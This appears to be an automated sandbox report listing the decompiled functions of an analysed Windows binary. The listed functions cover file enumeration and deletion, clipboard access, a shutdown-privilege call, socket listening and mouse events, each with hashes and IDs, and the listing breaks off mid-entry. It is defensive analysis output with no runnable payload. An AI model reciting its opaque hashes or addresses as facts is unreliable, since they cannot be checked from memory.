                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                      • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                      • API String ID: 3830820486-3289030164
                                                                                      • Opcode ID: 1d764e9eba58142075db47f59a8afea49cc7831388d542c5b6e2b8925d88897c
                                                                                      • Instruction ID: c16cc7276f3858ae5a934261cd0b74fa9111227c9dea95d06642a1db20d35975
                                                                                      • Opcode Fuzzy Hash: 1d764e9eba58142075db47f59a8afea49cc7831388d542c5b6e2b8925d88897c
                                                                                      • Instruction Fuzzy Hash: 1DD15E72508300AFC314EBA4D891EAFB7ECAF89704F04492DF595C7291EB74DA45EB62
                                                                                      Function 00C89642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00C89663
                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00C896A1
                                                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 00C896BB
                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00C896D3
                                                                                      • FindClose.KERNEL32(00000000), ref: 00C896DE
                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00C896FA
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00C8974A
                                                                                      • SetCurrentDirectoryW.KERNEL32(00CD6B7C), ref: 00C89768
                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C89772
                                                                                      • FindClose.KERNEL32(00000000), ref: 00C8977F
                                                                                      • FindClose.KERNEL32(00000000), ref: 00C8978F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                      • String ID: *.*
                                                                                      • API String ID: 1409584000-438819550
                                                                                      • Opcode ID: 2efca4a01feb5f7e0a26a879f5e22daff292350ba86c56e87fa5db827f0d1363
                                                                                      • Instruction ID: 5864703d5ce4aeb124cca40ab01f5983de2ac4ca1127a3afc97061857f7e6aff
                                                                                      • Opcode Fuzzy Hash: 2efca4a01feb5f7e0a26a879f5e22daff292350ba86c56e87fa5db827f0d1363
                                                                                      • Instruction Fuzzy Hash: 4531B0325012197ADB14BFB4DC49BEE77ACDF4A328F184166F915E31A0EB34DE408B58
                                                                                      Function 00C8979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00C897BE
                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00C89819
                                                                                      • FindClose.KERNEL32(00000000), ref: 00C89824
                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00C89840
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00C89890
                                                                                      • SetCurrentDirectoryW.KERNEL32(00CD6B7C), ref: 00C898AE
                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C898B8
                                                                                      • FindClose.KERNEL32(00000000), ref: 00C898C5
                                                                                      • FindClose.KERNEL32(00000000), ref: 00C898D5
                                                                                        • Part of subcall function 00C7DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00C7DB00
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                      • String ID: *.*
                                                                                      • API String ID: 2640511053-438819550
                                                                                      • Opcode ID: 9e22c776942402643d04734d45fce189ca331edd2803b126a9885d47d9fdf7f5
                                                                                      • Instruction ID: 9f4eaa2f47800a5430fee4fd252755d82378d8c59968c8c5712c003688f9528c
                                                                                      • Opcode Fuzzy Hash: 9e22c776942402643d04734d45fce189ca331edd2803b126a9885d47d9fdf7f5
                                                                                      • Instruction Fuzzy Hash: 5731923150161A7ADF14BFA4DC48BEE77ACDF06328F184166E924A31E0DB31DE44DB68
                                                                                      Function 00C88195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetLocalTime.KERNEL32(?), ref: 00C88257
                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00C88267
                                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00C88273
                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C88310
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00C88324
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00C88356
                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00C8838C
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00C88395
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentDirectoryTime$File$Local$System
                                                                                      • String ID: *.*
                                                                                      • API String ID: 1464919966-438819550
                                                                                      • Opcode ID: 57004ca5c9f19fbe13cf5d8a875840798b9e97350820e2e10f749e9b1c919864
                                                                                      • Instruction ID: 00dd1889fdd3c7ef77a8edcd24473cfd6a4942c0c2674699fc445a1bec6809a8
                                                                                      • Opcode Fuzzy Hash: 57004ca5c9f19fbe13cf5d8a875840798b9e97350820e2e10f749e9b1c919864
                                                                                      • Instruction Fuzzy Hash: 3C61AF725043059FCB10EF64C884AAEB3E8FF89314F44891EF999C7251EB31E949DB96
                                                                                      Function 00C7D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C13AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C13A97,?,?,00C12E7F,?,?,?,00000000), ref: 00C13AC2
                                                                                        • Part of subcall function 00C7E199: GetFileAttributesW.KERNEL32(?,00C7CF95), ref: 00C7E19A
                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00C7D122
                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00C7D1DD
                                                                                      • MoveFileW.KERNEL32(?,?), ref: 00C7D1F0
                                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 00C7D20D
                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C7D237
                                                                                        • Part of subcall function 00C7D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00C7D21C,?,?), ref: 00C7D2B2
                                                                                      • FindClose.KERNEL32(00000000,?,?,?), ref: 00C7D253
                                                                                      • FindClose.KERNEL32(00000000), ref: 00C7D264
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                      • String ID: \*.*
                                                                                      • API String ID: 1946585618-1173974218
                                                                                      • Opcode ID: 0d0ffeb50afa800ec5c66d5fd21248b2ec6194cb64b117cab35e33f48777e87c
                                                                                      • Instruction ID: 346603091191f4baccfbad29ac0497b520a665c36da269716e70684a4875cb74
                                                                                      • Opcode Fuzzy Hash: 0d0ffeb50afa800ec5c66d5fd21248b2ec6194cb64b117cab35e33f48777e87c
                                                                                      • Instruction Fuzzy Hash: C7619F31C0114D9FCF05EBE0C992AEDB7B5AF56304F648165E41A771A2EB306F4AEB60
                                                                                      Function 00C8ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                      • String ID:
                                                                                      • API String ID: 1737998785-0
                                                                                      • Opcode ID: f5f17989e915222f1495c918e21ceef1ac91ef38faa81022fbd1d9311da75b0d
                                                                                      • Instruction ID: ae2a4e78ac24e53f7135333d19a614ac30d6e6a7c44fcfc904dd62565cc66dd7
                                                                                      • Opcode Fuzzy Hash: f5f17989e915222f1495c918e21ceef1ac91ef38faa81022fbd1d9311da75b0d
                                                                                      • Instruction Fuzzy Hash: 59418B35204611AFE720EF15D888B59BBE5EF4532CF14C099F4298B7A2C735ED42CB94
                                                                                      Function 00C7E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C716C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C7170D
                                                                                        • Part of subcall function 00C716C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C7173A
                                                                                        • Part of subcall function 00C716C3: GetLastError.KERNEL32 ref: 00C7174A
                                                                                      • ExitWindowsEx.USER32(?,00000000), ref: 00C7E932
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                      • String ID: $ $@$SeShutdownPrivilege
                                                                                      • API String ID: 2234035333-3163812486
                                                                                      • Opcode ID: 2cbe07943716d6222a9297ce9e09c8ff6081105087fe7c9f8e64ce2c456a3288
                                                                                      • Instruction ID: 5ba57ae9c2c6692cac9b92d5975b65f7302b6dba7432f4e8264bb98a3cd179b1
                                                                                      • Opcode Fuzzy Hash: 2cbe07943716d6222a9297ce9e09c8ff6081105087fe7c9f8e64ce2c456a3288
                                                                                      • Instruction Fuzzy Hash: 3A014933610211AFEB6426B99CCAFFF725C9708754F18C462FE1BE31D1D6A05D409290
                                                                                      Function 00C91204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00C91276
                                                                                      • WSAGetLastError.WSOCK32 ref: 00C91283
                                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00C912BA
                                                                                      • WSAGetLastError.WSOCK32 ref: 00C912C5
                                                                                      • closesocket.WSOCK32(00000000), ref: 00C912F4
                                                                                      • listen.WSOCK32(00000000,00000005), ref: 00C91303
                                                                                      • WSAGetLastError.WSOCK32 ref: 00C9130D
                                                                                      • closesocket.WSOCK32(00000000), ref: 00C9133C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                      • String ID:
                                                                                      • API String ID: 540024437-0
                                                                                      • Opcode ID: 4277d29b679ae937f560bda7b154a6af7dd75b9707a6b951ebe5d2a7c6d4eb67
                                                                                      • Instruction ID: 50d5365d644ff7cd108697e16cc3d1b0be8b01e63d005c3da042485e372f8447
                                                                                      • Opcode Fuzzy Hash: 4277d29b679ae937f560bda7b154a6af7dd75b9707a6b951ebe5d2a7c6d4eb67
                                                                                      • Instruction Fuzzy Hash: CD4173316001419FDB10EF64C4C9B69BBE5BF46318F188198E8669F2D2C775ED81CBE1
                                                                                      Function 00C4B952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _free.LIBCMT ref: 00C4B9D4
                                                                                      • _free.LIBCMT ref: 00C4B9F8
                                                                                      • _free.LIBCMT ref: 00C4BB7F
                                                                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00CB3700), ref: 00C4BB91
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00CE121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00C4BC09
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00CE1270,000000FF,?,0000003F,00000000,?), ref: 00C4BC36
                                                                                      • _free.LIBCMT ref: 00C4BD4B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                      • String ID:
                                                                                      • API String ID: 314583886-0
                                                                                      • Opcode ID: 93f63ace2c4a43a70f07d520a5e9d341bbd5a02c9721c6c4007e8c37b70e50ea
                                                                                      • Instruction ID: 8e6adf1439aec34dce70b9ecef397bc017950c00f6fd34bf1717aeb3e7bea8c9
                                                                                      • Opcode Fuzzy Hash: 93f63ace2c4a43a70f07d520a5e9d341bbd5a02c9721c6c4007e8c37b70e50ea
                                                                                      • Instruction Fuzzy Hash: 35C11671A04245AFDB209F69CC81BAEBBB9FF51320F18419AE9A4DB251EB30DE41D750
                                                                                      Function 00C7D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C13AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C13A97,?,?,00C12E7F,?,?,?,00000000), ref: 00C13AC2
                                                                                        • Part of subcall function 00C7E199: GetFileAttributesW.KERNEL32(?,00C7CF95), ref: 00C7E19A
                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00C7D420
                                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 00C7D470
                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C7D481
                                                                                      • FindClose.KERNEL32(00000000), ref: 00C7D498
                                                                                      • FindClose.KERNEL32(00000000), ref: 00C7D4A1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                      • String ID: \*.*
                                                                                      • API String ID: 2649000838-1173974218
                                                                                      • Opcode ID: 69417e6b4654bb148b4ec3b6afce32375e88d7cef51da8c7434f0d24f4821a4f
                                                                                      • Instruction ID: 6842e7528b7086087198afd85b1549ff7594323606f316ccdfc8776edc8dd0ef
                                                                                      • Opcode Fuzzy Hash: 69417e6b4654bb148b4ec3b6afce32375e88d7cef51da8c7434f0d24f4821a4f
                                                                                      • Instruction Fuzzy Hash: 223182710093419FC300EF64C8959EFB7E8BE92314F448A1DF4E6531A1EB30AA49EB63
                                                                                      Function 00C4E4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: __floor_pentium4
                                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                      • API String ID: 4168288129-2761157908
                                                                                      • Opcode ID: 410ef73c84bd9a56208c392662da350cc741968523cac10b96c0a74efe3d7c87
                                                                                      • Instruction ID: a83fd9730878d486a1dc7fca97311a091d81e5397e0b51e8a639bc602c3393c2
                                                                                      • Opcode Fuzzy Hash: 410ef73c84bd9a56208c392662da350cc741968523cac10b96c0a74efe3d7c87
                                                                                      • Instruction Fuzzy Hash: A4C23A72E046288FDB25CE28DD407EAB7B5FB49315F1541EAD85DE7280E774AE828F40
                                                                                      Function 00C8648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _wcslen.LIBCMT ref: 00C864DC
                                                                                      • CoInitialize.OLE32(00000000), ref: 00C86639
                                                                                      • CoCreateInstance.OLE32(00CAFCF8,00000000,00000001,00CAFB68,?), ref: 00C86650
                                                                                      • CoUninitialize.OLE32 ref: 00C868D4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                      • String ID: .lnk
                                                                                      • API String ID: 886957087-24824748
                                                                                      • Opcode ID: ff0300871d948f27ac21ee0f066b756d5edb3f515985fb1a78c40e44afe3c939
                                                                                      • Instruction ID: a1ee4467611bf2f71af9663140abd31a7e1f63a0ece63222326b3847c22105be
                                                                                      • Opcode Fuzzy Hash: ff0300871d948f27ac21ee0f066b756d5edb3f515985fb1a78c40e44afe3c939
                                                                                      • Instruction Fuzzy Hash: 2AD14B71508301AFD304EF64C891AABB7E8FF99708F00496DF5958B291DB70EE46DB92
                                                                                      Function 00C922DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetForegroundWindow.USER32(?,?,00000000), ref: 00C922E8
                                                                                        • Part of subcall function 00C8E4EC: GetWindowRect.USER32(?,?), ref: 00C8E504
                                                                                      • GetDesktopWindow.USER32 ref: 00C92312
                                                                                      • GetWindowRect.USER32(00000000), ref: 00C92319
                                                                                      • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00C92355
                                                                                      • GetCursorPos.USER32(?), ref: 00C92381
                                                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00C923DF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                      • String ID:
                                                                                      • API String ID: 2387181109-0
                                                                                      • Opcode ID: b81d616df88a976d8a95ff010932c24f8e72aff0a500cbbf2e2460f38ed5c356
                                                                                      • Instruction ID: 9d5d4be7bc95b757c138a3acdefb6ab89f140163e27e25b19d7aa6fb04eebd38
                                                                                      • Opcode Fuzzy Hash: b81d616df88a976d8a95ff010932c24f8e72aff0a500cbbf2e2460f38ed5c356
                                                                                      • Instruction Fuzzy Hash: 2031FE72504315AFCB20DF14C849F9BBBADFF88714F000919F99897191DB34EA08CB92
                                                                                      Function 00C89B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C19CB3: _wcslen.LIBCMT ref: 00C19CBD
                                                                                      • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00C89B78
                                                                                      • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00C89C8B
                                                                                        • Part of subcall function 00C83874: GetInputState.USER32 ref: 00C838CB
                                                                                        • Part of subcall function 00C83874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C83966
                                                                                      • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00C89BA8
                                                                                      • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00C89C75
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
